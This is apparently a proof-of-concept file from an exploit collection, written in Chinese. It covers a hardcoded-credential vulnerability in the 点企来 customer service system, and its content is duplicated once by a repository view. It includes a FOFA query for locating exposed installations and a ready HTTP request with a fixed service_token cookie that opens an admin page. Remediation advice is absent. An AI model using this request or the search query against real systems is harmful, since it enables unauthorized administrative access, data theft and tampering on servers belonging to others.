POC/wpoc/点企来客服系统/点企来客服系统存在硬编码漏洞.md

# 点企来客服系统存在硬编码漏洞

点企来客服系统存在硬编码漏洞，攻击者利用此漏洞可直接进入应用系统或者管理系统，从而进行系统、网页、数据的篡改与删除，非法获取系统、用户的数据，甚至可能导致服务器沦陷。

## fofa

```yaml
body="layui-form-item" && body="/admin/login/check.html"
```

## poc

```javascript
GET /admin/custom/index.html HTTP/1.1
Host: 
Cookie: service_token=OuwfoovK%2BIdd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest
```

![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409261034762.png)


## 漏洞来源

- https://mp.weixin.qq.com/s/AeXSpX7Jrfkp8B1PjUHX-g
first commit 2025-03-04 23:12:57 +08:00			`# 点企来客服系统存在硬编码漏洞`

			`点企来客服系统存在硬编码漏洞，攻击者利用此漏洞可直接进入应用系统或者管理系统，从而进行系统、网页、数据的篡改与删除，非法获取系统、用户的数据，甚至可能导致服务器沦陷。`

			`## fofa`

			```yaml
			`body="layui-form-item" && body="/admin/login/check.html"`
			```

			`## poc`

			```javascript
			`GET /admin/custom/index.html HTTP/1.1`
			`Host:`
			`Cookie: service_token=OuwfoovK%2BIdd`
			`User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15`
			`X-Requested-With: XMLHttpRequest`
			```

			`![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409261034762.png)`



			`## 漏洞来源`

			`- https://mp.weixin.qq.com/s/AeXSpX7Jrfkp8B1PjUHX-g`